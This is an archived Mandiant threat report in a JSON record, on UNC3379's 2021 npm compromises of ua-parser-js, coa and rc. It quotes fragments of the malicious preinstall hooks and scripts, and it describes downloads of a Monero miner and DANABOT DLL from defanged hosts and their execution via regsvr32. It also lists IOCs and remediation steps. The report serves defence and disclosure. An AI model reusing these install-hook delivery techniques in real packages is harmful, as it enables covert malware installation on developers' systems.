{ "id": "12ec5eab-596d-48fd-afb9-fcb00a91e440", "created_at": "2026-04-06T00:11:42.383598Z", "updated_at": "2026-04-10T03:37:32.751768Z", "deleted_at": null, "sha1_hash": "cc61ec27c56eb729fe451f3153aea11424a7cd1a", "title": "No Unaccompanied Miners: Supply Chain Compromises Through Node.js Packages | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1413615, "plain_text": "No Unaccompanied Miners: Supply Chain Compromises Through\r\nNode.js Packages | Mandiant\r\nBy Mandiant\r\nPublished: 2021-12-15 · Archived: 2026-04-05 19:55:42 UTC\r\nWritten by: Alessandro Parilli, James Maclachlan\r\nStarting mid-October 2021, Mandiant Managed Defense identified multiple instances of supply chain compromises\r\ninvolving packages hosted on Node Package Manager (NPM), the package manager for the Node.js JavaScript platform,\r\neither being compromised directly to deliver malware or simply being created to impersonate popular, legitimate packages.\r\nThe latter is a technique known as typosquatting. NPM modules are a valuable target for threat actors due to their popularity\r\namongst developers. They also have a high prevalence of complex dependencies, where one package installs another as a\r\ndependency often without the knowledge of the developer. Furthermore, the NPM repository npmjs.com does not require the\r\ncode within the NPM package to be the same as the code within the linked GitHub repository. This means that the GitHub\r\nrepository does not need to be compromised; only the NPM package.\r\nWhile Mandiant assesses multiple threat groups to be leveraging these types of compromises, there is one prolific actor,\r\nUNC3379, whose activity will be discussed.\r\nSupply Chain Compromises\r\nBy compromising a popular package used by developers, it is easy to amplify the distribution of malicious code directly to\r\nvictims themselves at scale. This can be done either through dependency confusion, hijacking weak credentials, exploiting\r\nvulnerabilities to access the target code or using the names of packages abandoned by their developers. For example, in\r\n2018, the NPM module “flatmap-stream” was compromised to deliver cryptocurrency stealing malware. This module was\r\nused as a dependency of the much more popular library “event-stream”. In doing so, the threat actors were able to achieve\r\ncompromises at-scale with minimal effort. Figure 1 is a high-level diagram that demonstrates the threat actor’s process for\r\nsaid attack.\r\nFigure 1: Stages of infection via a malicious/compromised developer library\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 1 of 9\n\nThe following are the stages of infection via a malicious/compromised developer library, as seen in Figure 1:\r\n1. Attacker collects information about the build pipeline and code base through open-source intelligence gathering.\r\n2. Attacker builds and publishes the custom package.\r\n3. Pipeline grabs most recent package and deploys without validation.\r\n4. Malicious code is deployed through which an attacker can collect sensitive information such as cryptocurrency wallet\r\ninfo or credentials.\r\nA supply chain attack is nothing new. In 2017, the world was hit with the attack dubbed NotPetya. The malicious code,\r\ndisguised as ransomware, exploited the NSA’s leaked EternalBlue vulnerability to infiltrate networks and then\r\nsystematically destroy data. The attackers behind NotPetya breached a financial services software company who were a\r\nsupplier for the Ukrainian Government.\r\nIn the same year, the utility CCleaner suffered a breach and hackers were able to replace the legitimate version of the\r\nsoftware with a malicious one, that resulted in the compromise of more that 2 million hosts.\r\nIn 2020, UNC2452, a threat actor who's targeting is assessed to be consistent with Russian strategic interests, conducted a\r\nwidespread supply chain attack leveraging a SolarWinds component. The breadth of victims impacted by UNC2452\r\nincluded government organizations and Fortune 500 companies. Once again, attackers targeted the supply chain by injecting\r\na backdoor code in the software component Orion, giving them access to the internal environment of the victims and\r\ndeployed the SUNBURST malware after the updated code was distributed through a legitimate process. Mandiant was the\r\nfirst to detect and investigate the attack.\r\nAnother variation on the theme is the poisoning of open-source repositories, as is what happened in this case with the NPM\r\npackages. NPM packages have been abused, both by malicious actors and security researchers with the aim of raising\r\nawareness on the issue.\r\nSpotlight: UNC3379\r\nua-parser-js Compromise\r\nAccording to a GitHub issue raised on Oct. 22, 2021, at approximately 12:15 UTC, the NPM package “ua-parser-js\", a\r\npopular Node.js library that amassed over 7 million downloads per week, was compromised to deliver malware. The threat\r\nactor was able to publish three malicious versions of the package by hijacking the author’s NPM account. According to the\r\nrepository’s Git log, on Oct. 22, between 16:14 UTC and 16:25 UTC the package author committed a sanitized version of\r\nthe malicious packages to stop further compromises.\r\nMandiant detected and responded to identical activity on systems across multiple organizations and industries. Mandiant\r\ntracks this cluster of activity as UNC3379. In addition to investigating the detected intrusions, Mandiant Managed Defense\r\nproactively searched through the environments of our customers to uncover additional evil.\r\n“ua-parser-js” is a lightweight small footprint package deployed within a web application or server-side application to\r\nextract and filter the relevant data needed to parse a User Agent string (i.e., Browser, Engine, OS, CPU, and Device).\r\nIn this compromise, UNC3379 added multiple malicious scripts to the package that would ultimately result in the download\r\nand execution of both a Monero coin miner and a banking trojan known as DANABOT, depending on the operating system.\r\nThe compromised versions of “ua-parser-js\" were versions “0.7.29”, “0.8.0” and “1.0.0”.\r\nAnalysis of the Malicious Scripts Added to the Package\r\nThe infection was triggered by the package installation alone. The directive “preinstall” in the “package.json” file was used\r\nto execute a custom script before the actual installation process began. The executed script was named “preinstall.js”.\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 2 of 9\n\npackage.json:145: \"preinstall\": \"start /B node preinstall.js \u0026 nodepreinstall.js\",\r\nThe script “preinstall.js” performed a check to identify the underlying operating system:\r\nWindows – use of cmd.exe to execute “preinstall.bat”\r\npreinstall.js:23: const bat = spawn('cmd.exe', ['/c', 'preinstall.bat']);\r\nLinux – use of bash to execute “preinstall.sh”\r\npreinstall.js:4: exec(\"/bin/bash preinstall.sh\", (error, stdout, stderr) =\u003e {\r\nMac OSX – no execution\r\nThe shell script “preinstall.sh” performed a check on the victim’s geographical location:\r\npreinstall.sh:1: IP=$(curl -k hxxps://freegeoip.app/xml/ | grep 'RU\\|UA\\|BY\\|KZ')\r\nIf the victim was located in Russia, Ukraine, Belarus or Kazakhstan, the script terminated its execution. Otherwise, it\r\nproceeded to check whether the process “jsextension” already existed on the host. The script then tried to retrieve the\r\nresource “jsextension” from the IP address “159.148.186[.]228”, using curl, and resorting to wget if the download using curl\r\nhad failed (Figure 2). The executable “jsextension” was a Monero coin miner that was later executed with the aim of mining\r\nMonero cryptocurrency for the wallet:\r\n49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYK\r\nusing the mining pool MineXMR.\r\nFigure 2: preinstall.sh – download and execution of jsextension\r\nUnlike its Linux counterpart, the windows script “preinstall.bat” did not have any geographical check. Instead, it proceeded\r\nto attempt to retrieve a resource from the IP address “159.148.186[.]228” using “curl.exe”, or “wget.exe” if “curl.exe”\r\nfailed. If both failed, it finally leveraged “certutil.exe” to download the remote payload (Figure 3). The resource\r\ndownloaded, “jsextension.exe”, was the Windows version of the Monero coin miner and was executed with the same\r\nparameters as its Linux counterpart. Additionally, the script tried to download a resource from the URL\r\n“hxxps://citationsherbe[.]at/sdd.dll” and save it to disk with the filename “create.dll” located in the project’s\r\n“node_modules/ua-parser-js\" directory. Mandiant analysis revealed the DLL to be consistent with DANABOT whose config\r\ncontained the following command and control (C2) servers:\r\n185.158.250[.]216:443\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 3 of 9\n\n45.11.180[.]153:443\r\n194.76.225[.]46:443\r\n194.76.225[.]61:443\r\nFigure 3: preinstall.bat – download of “jsextension.exe” and “create.dll”\r\nThe script subsequently utilized the native binary “tasklist.exe” to enumerate the running processes on the system to check if\r\nthe coin miner executable “jsextension.exe” was already running before executing both the coin miner and the DANABOT\r\nDLL. The script attempted to execute DANABOT by leveraging regsvr32.exe to silently register the DANABOT DLL\r\n(“create.dll”) with the command “regsvr32.exe -s create.dll” (Figure 4).\r\nFigure 4: preinstall.bat – execution of “jsextension.exe” and “create.dll”\r\nua-parser-js has been targeted before\r\nThis is not the first time the NPM module “ua-parser-js\" has been targeted. On Oct. 14, 2021, a malicious NPM module\r\nnamed “klown” was uploaded to “npmjs.org” (Figure 5). This module attempted to impersonate the legitimate “ua-parser-js\"\r\nmodule by utilizing its branding, repository links, homepage, documentation and even leveraging the website\r\n“contrib.rocks” to collect an image of all of the contributors to the “ua-parser-js\" repository, which was all in an attempt to\r\nappear legitimate. Prior to the removal from npmjs.org, the malicious package already had 23 downloads. Mandiant assesses\r\nwith high confidence the threat actor responsible to be UNC3379 based on the large overlap in tactics, techniques and\r\nprocedures (TTPs). Mandiant assesses that this module impersonation served as an opportunity to test the malware delivery\r\nbefore the compromise of the real package on Oct. 22.\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 4 of 9\n\nFigure 5: The npmjs.org page for the “klown” package.\r\nIn this particular instance, the malicious package also deployed the same Monero miner (MD5:\r\nfc724eb2894f34a3aca4b952d2f816cd) which was downloaded from the URL\r\n“hxxp://185.173.36[.]219/download/jsextension.exe” from a script that was also named “preinstall.bat”.\r\nCoa \u0026 rc Module Compromises\r\nIn another iteration of the attack, the NPM packages “coa” and “rc” were targeted in a fashion similar to that observed\r\nagainst “ua-parser-js\". On Nov. 4, these popular libraries were subject to several updates containing malicious code designed\r\nto download and execute a slightly modified version of the DANABOT DLL seen earlier in the attack on Oct. 22, 2021. This\r\ntime, the target OS was restricted to Windows. Mandiant assesses with high confidence the threat actor responsible to also\r\nbe UNC3379 due to the overlap in TTPs. Following the discovery of the malicious packages, the NPM security team\r\nremoved the compromised “coa” and “rc” versions of the packages.\r\nMandiant Managed Defense identified and responded to a compromise where these packages were leveraged. The malicious\r\nversion of the package “rc” was present on the host as dependency of the “hint” NPM package, used in one of the victim’s\r\nprojects (Figure 6).\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 5 of 9\n\nFigure 6: Dependencies tree showing the relation between the package “hint” and the hijacked dependency package “rc”\r\nversion 2.3.9\r\nThis is indicative of the fact that a malicious package can easily be delivered unbeknownst to the user, due to the recursive\r\nnature of dependencies used in NPM packages. A single application can have dozens of packages incorporated within its\r\ncode as part of the application build process.\r\nHow to Check if the Malicious Packages Were Downloaded\r\nThe NPM command line tool can be used to check if a specific version of a package was previously downloaded. For the\r\ncases presented, the relevant malicious versions were, respectively:\r\nua-parser-js versions 0.7.29, 0.8.0, 1.0.0\r\ncoa versions 2.0.3, 2.0.4, 2.1.1, 2.1.3, 3.1.3\r\nrc versions 1.2.9, 1.3.9, 2.3.9\r\nThe command npm cache ls shows the history of the fetched packages, complete with the version:\r\n# npm cache ls rc\r\nmake-fetch-happen:request-cache:https://registry.npmjs.org/rc\r\nmake-fetch-happen:request-cache:https://registry.npmjs.org/rc/-/rc-1.2.8.tgz\r\nThe output of the command “npm cache ls rc” reveals the downloaded version of the “rc” package, in this case 1.2.8.\r\nAdditionally, to show a full tree of the dependencies used in a package, launch the command \"npm ls –a\" from the package\r\ndirectory.\r\nConclusion\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 6 of 9\n\nSupply chain compromises are designed to abuse the trust in third party providers to indirectly gain access to a victim’s\r\nenvironment, which can be difficult to detect. By proactively and consistently monitoring our customers for threats resulting\r\nfrom supply chain compromises, Mandiant Managed Defense was able to find this type of evil and assist our customers on\r\nremediation where malicious packages were installed within their environments. As a result of this, Mandiant did not\r\nidentify any further malicious activity following the initial compromise at any of our customers.\r\nPrevention and Remediation\r\nCheck for the presence in your environment of any of the mentioned packages.\r\nMake sure the installed “coa” package version is 2.0.2, latest stable at the time of writing.\r\nMake sure the installed “rc” package version is 1.2.8, latest stable at the time of writing.\r\nMake sure the installed “ua-parser-js” package versions are 0.7.30, 0.8.1 or 1.0.1, latest stable at the time of writing.\r\nCheck for the existence on the environment of the malicious files detailed in this blog post and remove them (refer to\r\nthe IOC section).\r\nAny secrets or credentials should be considered compromised on the infected host and changed.\r\nConsider locking version numbers of packages to prevent from auto-installing a new package that may be malicious\r\nMalware Definitions\r\nDANABOT\r\nDANABOT is backdoor written in Delphi that communicates using a custom binary protocol over TCP. The backdoor\r\nimplements a plug-in framework that allows it to add capabilities via downloaded plugins. DANABOT's capabilities include\r\nfull system control using a VNC or RDP plugin, video and screenshot capture, keylogging, arbitrary shell command\r\nexecution, and file transfer. DANABOT's proxy plugin allows it to redirect or manipulate network traffic associated with\r\ntargeted websites. This capability is often used to capture credentials or payment data. DANABOT can also extract stored\r\ncredentials associated with web browsers and FTP clients.\r\nMITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category Techniques\r\nResource Development T1608.003: Stage Capabilities: Install Digital Certificate\r\nInitial Compromise T1195.002: Supply Chain Compromise: Compromise Software Supply Chain\r\nExecution\r\nT1059: Command and Scripting Interpreter\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nDefense Evasion\r\nT1218.010: Signed Binary and Proxy Execution: Regsvr32\r\nT1055: Process Injection\r\nT1497.001: Virtualization/Sandbox Evasion: System Checks\r\nT1027: Obfuscated Files or Information\r\nDiscovery\r\nT1518: Software Discovery\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 7 of 9\n\nT1057: Process Discovery\r\nCommand and Control\r\nT1573.002: Encrypted Channel: Asymmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1071.004: Application Layer Protocol: DNS\r\nImpact T1496: Resource Hijacking\r\nIOCs\r\nIOC Notes MD5\r\npackage.json Conf JSON (ua-parser-js) 13f840772c7c04c7d2f4c202ff957b0c\r\npreinstall.js Javascript (ua-parser-js) a4668a1b3f23b79ef07d1afe0152999e\r\npreinstall.sh Shell script (ua-parser-js) de8b54a938ac18f15cad804d79a0e19d\r\npreinstall.bat cmd script (ua-parser-js) d98a3013336b755b739d285a58528cbe\r\nsdd.dll Danabot DLL (ua-parser-js) de8b54a938ac18f15cad804d79a0e19d\r\njsextension.exe coin miner (ua-parser-js) fc724eb2894f34a3aca4b952d2f816cd\r\n185.158.250[.]216 C2 IP address (ua-parser-js) /\r\n45.11.180[.]153 C2 IP address (ua-parser-js) /\r\n194.76.225[.]46 C2 IP address (ua-parser-js) /\r\n194.76.225[.]61 C2 IP address (ua-parser-js) /\r\n159.148.186[.]228 IP address hosting the coin miner (ua-parser-js) /\r\ncitationsherbe[.]at Domain hosting the Danabot DLL (ua-parser-js) /\r\nsdd.dll Danabot DLL (coa) 9c6664390b305a8aeeec859ab8169095\r\nsdd.dll Danabot DLL (rc) 429dd6c558041f945d00ba70261117f6\r\npastorcryptograph[.]at Domain hosting the Danabot DLL (coa and rc) /\r\n185.117.90[.]36 C2 IP address (coa and rc) /\r\n193.42.36[.]59 C2 IP address (coa and rc) /\r\n185.106.123[.]228 C2 IP address (coa and rc) /\r\n193.56.146[.]53 C2 IP address (coa and rc) /\r\nAcknowledgements\r\nSpecial thanks to Andrew Rector, Bryce Abdo, Cian Lynch, Nader Zaveri and Yash Gupta for their assistance on the topic.\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 8 of 9\n\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/supply-chain-node-js\r\nhttps://www.mandiant.com/resources/supply-chain-node-js\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.mandiant.com/resources/supply-chain-node-js" ], "report_names": [ "supply-chain-node-js" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434302, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cc61ec27c56eb729fe451f3153aea11424a7cd1a.pdf", "text": "https://archive.orkl.eu/cc61ec27c56eb729fe451f3153aea11424a7cd1a.txt", "img": "https://archive.orkl.eu/cc61ec27c56eb729fe451f3153aea11424a7cd1a.jpg" } }